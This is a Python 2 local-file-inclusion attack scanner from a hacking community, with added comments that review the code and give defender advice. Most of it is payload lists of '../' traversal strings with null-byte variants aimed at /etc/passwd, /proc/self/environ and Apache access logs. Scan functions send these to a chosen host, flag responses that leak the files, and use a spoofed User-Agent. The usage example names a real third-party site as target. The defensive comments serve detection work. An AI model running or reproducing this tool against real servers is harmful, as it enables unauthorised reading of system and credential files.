- #!/usr/bin/python
- # Author: parkdream1
- # Messenger: h3x4r
- # (c) R00TW0RM - Private Community
- # https://r00tw0rm.com/
- # Local File Include Scaner Ver. 1.1
- # Greets: To all members of r00tw0rm !!
- import socket,sys,re,random,time,httplib
- from random import choice
# Request suffixes used by scanpasswd(): /etc/passwd reached through 0 to 13
# levels of "../", first plain and then with a trailing %00.
# Each entry is appended unencoded to the user-supplied path in the GET line.
# NOTE(review): the %00 variants presumably target runtimes that truncate a
# file path at an embedded NUL byte; verify against the stack being assessed.
# Defender note: a parameter value made only of "../" repetitions followed by
# etc/passwd is a stable signature of include/traversal probing in access logs.
- passwd = ["/etc/passwd",
- "../etc/passwd",
- "../../etc/passwd",
- "../../../etc/passwd",
- "../../../../etc/passwd",
- "../../../../../etc/passwd",
- "../../../../../../etc/passwd",
- "../../../../../../../etc/passwd",
- "../../../../../../../../etc/passwd",
- "../../../../../../../../../etc/passwd",
- "../../../../../../../../../../etc/passwd",
- "../../../../../../../../../../../etc/passwd",
- "../../../../../../../../../../../../etc/passwd",
- "../../../../../../../../../../../../../etc/passwd",
- "/etc/passwd%00",
- "../etc/passwd%00",
- "../../etc/passwd%00",
- "../../../etc/passwd%00",
- "../../../../etc/passwd%00",
- "../../../../../etc/passwd%00",
- "../../../../../../etc/passwd%00",
- "../../../../../../../etc/passwd%00",
- "../../../../../../../../etc/passwd%00",
- "../../../../../../../../../etc/passwd%00",
- "../../../../../../../../../../etc/passwd%00",
- "../../../../../../../../../../../etc/passwd%00",
- "../../../../../../../../../../../../etc/passwd%00",
- "../../../../../../../../../../../../../etc/passwd%00"]
# Request suffixes used by scanenviron(): /proc/self/environ reached through
# 0 to 14 levels of "../", first plain and then with a trailing %00.
# Defender note: /proc/self/environ holds the environment of the process that
# reads it, so a response echoing it discloses whatever the web server process
# was started with. Requests naming proc/self/environ in a parameter have no
# legitimate use and are worth alerting on.
- environ = ["/proc/self/environ",
- "../proc/self/environ",
- "../../proc/self/environ",
- "../../../proc/self/environ",
- "../../../../proc/self/environ",
- "../../../../../proc/self/environ",
- "../../../../../../proc/self/environ",
- "../../../../../../../proc/self/environ",
- "../../../../../../../../proc/self/environ",
- "../../../../../../../../../proc/self/environ",
- "../../../../../../../../../../proc/self/environ",
- "../../../../../../../../../../../proc/self/environ",
- "../../../../../../../../../../../../proc/self/environ",
- "../../../../../../../../../../../../../proc/self/environ",
- "../../../../../../../../../../../../../../proc/self/environ",
- "/proc/self/environ%00",
- "../proc/self/environ%00",
- "../../proc/self/environ%00",
- "../../../proc/self/environ%00",
- "../../../../proc/self/environ%00",
- "../../../../../proc/self/environ%00",
- "../../../../../../proc/self/environ%00",
- "../../../../../../../proc/self/environ%00",
- "../../../../../../../../proc/self/environ%00",
- "../../../../../../../../../proc/self/environ%00",
- "../../../../../../../../../../proc/self/environ%00",
- "../../../../../../../../../../../proc/self/environ%00",
- "../../../../../../../../../../../../proc/self/environ%00",
- "../../../../../../../../../../../../../proc/self/environ%00",
- "../../../../../../../../../../../../../../proc/self/environ%00"]
# Request suffixes used by scanlogs(): six Apache access-log locations
# (/usr/local/apache2/logs/access_log, /var/log/apache2/access.log,
# /var/log/httpd/access_log, /var/log/httpd-access.log,
# /var/www/logs/access_log, /var/apache2/logs/access_log), each reached through
# 0 to 14 levels of "../", first plain and then with a %00 suffix (one entry
# ends in %0 instead).
# Defender note: none of these files needs to be readable by the account the
# web application runs as; tightening log permissions removes this whole list
# as a disclosure path even where an include flaw exists.
- logs = ["/usr/local/apache2/logs/access_log",
- "../usr/local/apache2/logs/access_log",
- "../../usr/local/apache2/logs/access_log",
- "../../../usr/local/apache2/logs/access_log",
- "../../../../usr/local/apache2/logs/access_log",
- "../../../../../usr/local/apache2/logs/access_log",
- "../../../../../../usr/local/apache2/logs/access_log",
- "../../../../../../../usr/local/apache2/logs/access_log",
- "../../../../../../../../usr/local/apache2/logs/access_log",
- "../../../../../../../../../usr/local/apache2/logs/access_log",
- "../../../../../../../../../../usr/local/apache2/logs/access_log",
- "../../../../../../../../../../../usr/local/apache2/logs/access_log",
- "../../../../../../../../../../../../usr/local/apache2/logs/access_log",
- "../../../../../../../../../../../../../usr/local/apache2/logs/access_log",
- "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log",
- "/usr/local/apache2/logs/access_log%00",
- "../usr/local/apache2/logs/access_log%00",
- "../../usr/local/apache2/logs/access_log%00",
- "../../../usr/local/apache2/logs/access_log%00",
- "../../../../usr/local/apache2/logs/access_log%00",
- "../../../../../usr/local/apache2/logs/access_log%00",
- "../../../../../../usr/local/apache2/logs/access_log%00",
- "../../../../../../../usr/local/apache2/logs/access_log%00",
- "../../../../../../../../usr/local/apache2/logs/access_log%00",
- "../../../../../../../../../usr/local/apache2/logs/access_log%00",
- "../../../../../../../../../../usr/local/apache2/logs/access_log%00",
- "../../../../../../../../../../../usr/local/apache2/logs/access_log%00",
- "../../../../../../../../../../../../usr/local/apache2/logs/access_log%00",
- "../../../../../../../../../../../../../usr/local/apache2/logs/access_log%00",
- "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log%00",
- "/var/log/apache2/access.log",
- "../var/log/apache2/access.log",
- "../../var/log/apache2/access.log",
- "../../../var/log/apache2/access.log",
- "../../../../var/log/apache2/access.log",
- "../../../../../var/log/apache2/access.log",
- "../../../../../../var/log/apache2/access.log",
- "../../../../../../../var/log/apache2/access.log",
- "../../../../../../../../var/log/apache2/access.log",
- "../../../../../../../../../var/log/apache2/access.log",
- "../../../../../../../../../../var/log/apache2/access.log",
- "../../../../../../../../../../../var/log/apache2/access.log",
- "../../../../../../../../../../../../var/log/apache2/access.log",
- "../../../../../../../../../../../../../var/log/apache2/access.log",
- "../../../../../../../../../../../../../../var/log/apache2/access.log",
- "/var/log/apache2/access.log%00",
- "../var/log/apache2/access.log%00",
- "../../var/log/apache2/access.log%00",
- "../../../var/log/apache2/access.log%00",
- "../../../../var/log/apache2/access.log%00",
- "../../../../../var/log/apache2/access.log%00",
- "../../../../../../var/log/apache2/access.log%00",
- "../../../../../../../var/log/apache2/access.log%00",
- "../../../../../../../../var/log/apache2/access.log%00",
- "../../../../../../../../../var/log/apache2/access.log%00",
- "../../../../../../../../../../var/log/apache2/access.log%00",
- "../../../../../../../../../../../var/log/apache2/access.log%00",
- "../../../../../../../../../../../../var/log/apache2/access.log%00",
- "../../../../../../../../../../../../../var/log/apache2/access.log%00",
- "../../../../../../../../../../../../../../var/log/apache2/access.log%00",
- "/var/log/httpd/access_log",
- "../var/log/httpd/access_log",
- "../../var/log/httpd/access_log",
- "../../../var/log/httpd/access_log",
- "../../../../var/log/httpd/access_log",
- "../../../../../var/log/httpd/access_log",
- "../../../../../../var/log/httpd/access_log",
- "../../../../../../../var/log/httpd/access_log",
- "../../../../../../../../var/log/httpd/access_log",
- "../../../../../../../../../var/log/httpd/access_log",
- "../../../../../../../../../../var/log/httpd/access_log",
- "../../../../../../../../../../../var/log/httpd/access_log",
- "../../../../../../../../../../../../var/log/httpd/access_log",
- "../../../../../../../../../../../../../var/log/httpd/access_log",
- "../../../../../../../../../../../../../../var/log/httpd/access_log",
- "/var/log/httpd/access_log%00",
- "../var/log/httpd/access_log%00",
- "../../var/log/httpd/access_log%00",
- "../../../var/log/httpd/access_log%00",
- "../../../../var/log/httpd/access_log%00",
- "../../../../../var/log/httpd/access_log%00",
- "../../../../../../var/log/httpd/access_log%00",
- "../../../../../../../var/log/httpd/access_log%00",
- "../../../../../../../../var/log/httpd/access_log%00",
- "../../../../../../../../../var/log/httpd/access_log%00",
- "../../../../../../../../../../var/log/httpd/access_log%00",
- "../../../../../../../../../../../var/log/httpd/access_log%00",
- "../../../../../../../../../../../../var/log/httpd/access_log%00",
- "../../../../../../../../../../../../../var/log/httpd/access_log%00",
- "../../../../../../../../../../../../../../var/log/httpd/access_log%00",
- "/var/log/httpd-access.log",
- "../var/log/httpd-access.log",
- "../../var/log/httpd-access.log",
- "../../../var/log/httpd-access.log",
- "../../../../var/log/httpd-access.log",
- "../../../../../var/log/httpd-access.log",
- "../../../../../../var/log/httpd-access.log",
- "../../../../../../../var/log/httpd-access.log",
- "../../../../../../../../var/log/httpd-access.log",
- "../../../../../../../../../var/log/httpd-access.log",
- "../../../../../../../../../../var/log/httpd-access.log",
- "../../../../../../../../../../../var/log/httpd-access.log",
- "../../../../../../../../../../../../var/log/httpd-access.log",
- "../../../../../../../../../../../../../var/log/httpd-access.log",
- "../../../../../../../../../../../../../../var/log/httpd-access.log",
- "/var/log/httpd-access.log%00",
- "../var/log/httpd-access.log%00",
- "../../var/log/httpd-access.log%00",
- "../../../var/log/httpd-access.log%00",
- "../../../../var/log/httpd-access.log%00",
- "../../../../../var/log/httpd-access.log%00",
- "../../../../../../var/log/httpd-access.log%00",
- "../../../../../../../var/log/httpd-access.log%00",
- "../../../../../../../../var/log/httpd-access.log%00",
- "../../../../../../../../../var/log/httpd-access.log%00",
- "../../../../../../../../../../var/log/httpd-access.log%00",
- "../../../../../../../../../../../var/log/httpd-access.log%00",
- "../../../../../../../../../../../../var/log/httpd-access.log%00",
- "../../../../../../../../../../../../../var/log/httpd-access.log%00",
- "../../../../../../../../../../../../../../var/log/httpd-access.log%00",
- "/var/www/logs/access_log",
- "../var/www/logs/access_log",
- "../../var/www/logs/access_log",
- "../../../var/www/logs/access_log",
- "../../../../var/www/logs/access_log",
- "../../../../../var/www/logs/access_log",
- "../../../../../../var/www/logs/access_log",
- "../../../../../../../var/www/logs/access_log",
- "../../../../../../../../var/www/logs/access_log",
- "../../../../../../../../../var/www/logs/access_log",
- "../../../../../../../../../../var/www/logs/access_log",
- "../../../../../../../../../../../var/www/logs/access_log",
- "../../../../../../../../../../../../var/www/logs/access_log",
- "../../../../../../../../../../../../../var/www/logs/access_log",
- "../../../../../../../../../../../../../../var/www/logs/access_log",
- "/var/www/logs/access_log%00",
- "../var/www/logs/access_log%00",
- "../../var/www/logs/access_log%00",
- "../../../var/www/logs/access_log%00",
- "../../../../var/www/logs/access_log%00",
- "../../../../../var/www/logs/access_log%00",
- "../../../../../../var/www/logs/access_log%00",
- "../../../../../../../var/www/logs/access_log%00",
- "../../../../../../../../var/www/logs/access_log%00",
- "../../../../../../../../../var/www/logs/access_log%00",
- "../../../../../../../../../../var/www/logs/access_log%00",
- "../../../../../../../../../../../var/www/logs/access_log%00",
- "../../../../../../../../../../../../var/www/logs/access_log%00",
- "../../../../../../../../../../../../../var/www/logs/access_log%00",
- "../../../../../../../../../../../../../../var/www/logs/access_log%0",
- "/var/apache2/logs/access_log",
- "../var/apache2/logs/access_log",
- "../../var/apache2/logs/access_log",
- "../../../var/apache2/logs/access_log",
- "../../../../var/apache2/logs/access_log",
- "../../../../../var/apache2/logs/access_log",
- "../../../../../../var/apache2/logs/access_log",
- "../../../../../../../var/apache2/logs/access_log",
- "../../../../../../../../var/apache2/logs/access_log",
- "../../../../../../../../../var/apache2/logs/access_log",
- "../../../../../../../../../../var/apache2/logs/access_log",
- "../../../../../../../../../../../var/apache2/logs/access_log",
- "../../../../../../../../../../../../var/apache2/logs/access_log",
- "../../../../../../../../../../../../../var/apache2/logs/access_log",
- "../../../../../../../../../../../../../../var/apache2/logs/access_log",
- "/var/apache2/logs/access_log%00",
- "../var/apache2/logs/access_log%00",
- "../../var/apache2/logs/access_log%00",
- "../../../var/apache2/logs/access_log%00",
- "../../../../var/apache2/logs/access_log%00",
- "../../../../../var/apache2/logs/access_log%00",
- "../../../../../../var/apache2/logs/access_log%00",
- "../../../../../../../var/apache2/logs/access_log%00",
- "../../../../../../../../var/apache2/logs/access_log%00",
- "../../../../../../../../../var/apache2/logs/access_log%00",
- "../../../../../../../../../../var/apache2/logs/access_log%00",
- "../../../../../../../../../../../var/apache2/logs/access_log%00",
- "../../../../../../../../../../../../var/apache2/logs/access_log%00",
- "../../../../../../../../../../../../../var/apache2/logs/access_log%00",
- "../../../../../../../../../../../../../../var/apache2/logs/access_log%00"]
# Ten browser-style User-Agent strings. `agent` is drawn from them once, when
# the module is loaded, so every request of a single run carries the same
# header value; it is not re-drawn per request.
# Defender note: the User-Agent on these requests is therefore arbitrary and
# should not be used to attribute or filter the traffic; correlate on source
# address, request rate and the traversal pattern in the URL instead.
- user = ['Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))',
- 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)',
- 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)',
- 'Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0',
- 'Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)',
- 'Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0',
- 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; chromeframe/12.0.742.112)',
- 'Opera/9.80 (X11; Linux i686; U; ru) Presto/2.8.131 Version/11.11',
- 'Opera/9.80 (X11; Linux i686; U; es-ES) Presto/2.8.131 Version/11.11',
- 'Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/5.0 Opera 11.11']
- agent = random.choice(user)
# scanpasswd(): request "/" + path + entry for every entry of `passwd` and
# report whether the response contains the root line of a passwd file.
# Reads the module globals target, port and path (assigned in the __main__
# block) and agent. Returns nothing; it prints its findings and exits the
# process on the first match or the first socket error.
# NOTE(review): the listing has lost its indentation, so the nesting is
# inferred from statement order; presumably everything down to time.sleep(1)
# runs once per list entry. Confirm against an unmangled copy.
# Defender note: on the server this shows up as a run of GETs from one client,
# roughly one per second, whose parameter value gains one "../" per request and
# ends in etc/passwd. The durable fix is to never build an include path from
# request data, or to resolve it and check it stays inside an allow-listed
# directory before opening it.
- def scanpasswd():
- for lfi in passwd:
- try:
- r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
- r.connect((target, port))
# Hand-written HTTP/1.0 request; path and the list entry are concatenated
# into the request line without any encoding.
- r.send("GET /"+path+lfi+" HTTP/1.0\r\n")
- r.send("Host: "+target+"\r\n")
- r.send("User-Agent: "+agent+"\r\n\r\n")
- print "[*] Send Request Success"
- print "http://"+target+"/"+path+lfi
# Read in 1024-byte pieces until recv() returns an empty string.
- page = r.recv(1024)
- fullpage = ""
- while len(page):
- fullpage = fullpage + page
- page = r.recv(1024)
- r.close()
# Any exception raised above ends the whole run with exit status 1.
- except Exception, e:
- print "[-] Cant Not Send Request"
- print e
- sys.exit(1)
# Headers and body are searched together for the start of the root account line.
- r00t = re.search("root:x:0:0:",fullpage)
- if r00t:
- print "\033[32m[*] Request Vulnerability\n"
# Stops at the first hit; the exit status is 1 here as well.
- sys.exit(1)
- else:
- print "[-] Request Is Not Vulnerability\n"
# One-second pause, presumably between consecutive requests.
- time.sleep(1)
# scanenviron(): request "/" + path + entry for every entry of `environ` and
# report whether the response contains the string "HTTP_HOST".
# Reads the module globals target, port and path (assigned in the __main__
# block) and agent. Returns nothing; it prints its findings and exits the
# process on the first match or the first socket error.
# NOTE(review): indentation is lost in this listing, so the nesting is inferred
# from statement order; presumably everything down to time.sleep(1) runs once
# per list entry.
# Defender note: the web server account should have no reason to serve
# /proc/self/environ; a request parameter naming it, repeated with growing
# "../" depth, is probing and can be blocked or alerted on at the edge.
- def scanenviron():
- for lfi1 in environ:
- try:
- r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
- r.connect((target, port))
# Hand-written HTTP/1.0 request; path and the list entry are concatenated
# into the request line without any encoding.
- r.send("GET /"+path+lfi1+" HTTP/1.0\r\n")
- r.send("Host: "+target+"\r\n")
- r.send("User-Agent: "+agent+"\r\n\r\n")
- print "[*] Send Request Success"
- print "http://"+target+"/"+path+lfi1
# Read in 1024-byte pieces until recv() returns an empty string.
- page = r.recv(1024)
- fullpage = ""
- while len(page):
- fullpage = fullpage + page
- page = r.recv(1024)
- r.close()
# Any exception raised above ends the whole run with exit status 1.
- except Exception, e:
- print "[-] Cant Not Send Request"
- print e
- sys.exit(1)
# "HTTP_HOST" is used as the marker that environment contents came back;
# the whole response, headers included, is searched.
- r00t = re.search("HTTP_HOST",fullpage)
- if r00t:
- print "\033[32m[*] Request Vulnerability\n"
# Stops at the first hit; the exit status is 1 here as well.
- sys.exit(1)
- else:
- print "[-] Request Is Not Vulnerability\n"
# One-second pause, presumably between consecutive requests.
- time.sleep(1)
# scanlogs(): send one HEAD / request, then request "/" + path + entry for
# every entry of `logs` and report whether a response contains the text
# "HEAD / HTTP/1.1", i.e. the request line that the first call should have
# left in the server's access log.
# Reads the module globals target, port and path (assigned in the __main__
# block) and agent. Returns nothing; it prints its findings and exits the
# process on the first match or the first socket error.
# NOTE(review): indentation is lost in this listing, so the nesting is inferred
# from statement order; presumably everything from `try` down to time.sleep(1)
# runs once per list entry.
# Defender note: the run is recognisable as a single HEAD / followed by GETs
# from the same client whose parameter value names access-log paths at growing
# "../" depth. Access logs should not be readable by the account the web
# application runs as, and include paths should never be built from request data.
- def scanlogs():
# httplib connection to target with no port argument, so `port` is not used
# here; the response is never read and the connection is never closed.
- conn = httplib.HTTPConnection(target)
- conn.request("HEAD","/")
- for lfi2 in logs:
- try:
- r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
- r.connect((target, port))
# Hand-written HTTP/1.0 request; path and the list entry are concatenated
# into the request line without any encoding.
- r.send("GET /"+path+lfi2+" HTTP/1.0\r\n")
- r.send("Host: "+target+"\r\n")
- r.send("User-Agent: "+agent+"\r\n\r\n")
- print "[*] Send Request Success"
- print "http://"+target+"/"+path+lfi2
# Read in 1024-byte pieces until recv() returns an empty string.
- page = r.recv(1024)
- fullpage = ""
- while len(page):
- fullpage = fullpage + page
- page = r.recv(1024)
- r.close()
# Any exception raised above ends the whole run with exit status 1.
- except Exception, e:
- print "[-] Cant Not Send Request"
- print e
- sys.exit(1)
# Looks for the logged request line of the HEAD call made at the top.
- r00t = re.search("HEAD / HTTP/1.1",fullpage)
- if r00t:
- print "\033[32m[*] Request Vulnerability\n"
# Stops at the first hit; the exit status is 1 here as well.
- sys.exit(1)
- else:
- print "[-] Request Is Not Vulnerability\n"
# One-second pause, presumably between consecutive requests.
- time.sleep(1)
# menu(): print the four numbered choices, read one line from stdin with
# raw_input() and run the matching scan function.
# Every recognised choice ends in sys.exit(1), so the process exit status is 1
# even after a normal run or an explicit "Exit".
# NOTE(review): indentation is lost in this listing; the trailing `else`
# presumably belongs to the `mess == "4"` test and re-enters menu()
# recursively on unrecognised input.
- def menu():
- print "Menu:\n"
- print "ID [1]"
- print "[Scan /etc/passwd File]\n"
- print "ID [2]"
- print "[Scan Environ File]\n"
- print "ID [3]"
- print "[Scan Access Logs File]\n"
- print "ID [4]"
- print "[Exit]\n"
# The input is compared as a string; no conversion to int takes place.
- mess = raw_input("[*] Select ID For Start Scanner :")
- if mess == "1":
- print "Scan /etc/passwd File Starting ...\n"
- scanpasswd()
- sys.exit(1)
- if mess == "2":
- print "Scan /proc/self/environ File Starting ...\n"
- scanenviron()
- sys.exit(1)
- if mess == "3":
- print "Scan Access Logs File Starting ...\n"
- scanlogs()
- sys.exit(1)
- if mess == "4":
- print "Exiting..."
- sys.exit(1)
- else:
- print "Unknow Command\n"
- print "Please rechoice ID\n"
- menu()
# banner(): print the tool's title block to stdout, including the target host
# and port taken from the module globals set in the __main__ block.
# It only prints; no network activity happens here.
- def banner():
- print "\n"
- print "****************************************************************************"
- print "|| Local File Include Scaner Ver. 1.1 ||"
- print "|| by parkdream1 ||"
- print "|| (c) R00TW0RM - Private Community ||"
- print " Fucking from "+target+" on port "+str(port)
- print "****************************************************************************"
- print "\n"
# Script entry point. Requires exactly three command-line arguments (host,
# port, path prefix); otherwise it prints the usage line to stderr, an example
# to stdout, and exits with status 1.
# target, port and path are assigned here as module-level names; the scan
# functions and banner() read them as globals rather than taking parameters.
# The port argument goes through int(), which raises ValueError on a
# non-numeric value; host and path are used exactly as typed.
- if __name__ == '__main__':
- if len(sys.argv) != 4:
- print >>sys.stderr, "Usage:", sys.argv[0], "<Target IP> <Port> <Path>"
- print "Example: python", sys.argv[0], "playerstage.sourceforge.net 80 "+'"index.php?src="'
- sys.exit(1)
- target, port, path = sys.argv[1], int(sys.argv[2]), sys.argv[3]
- banner()
- menu()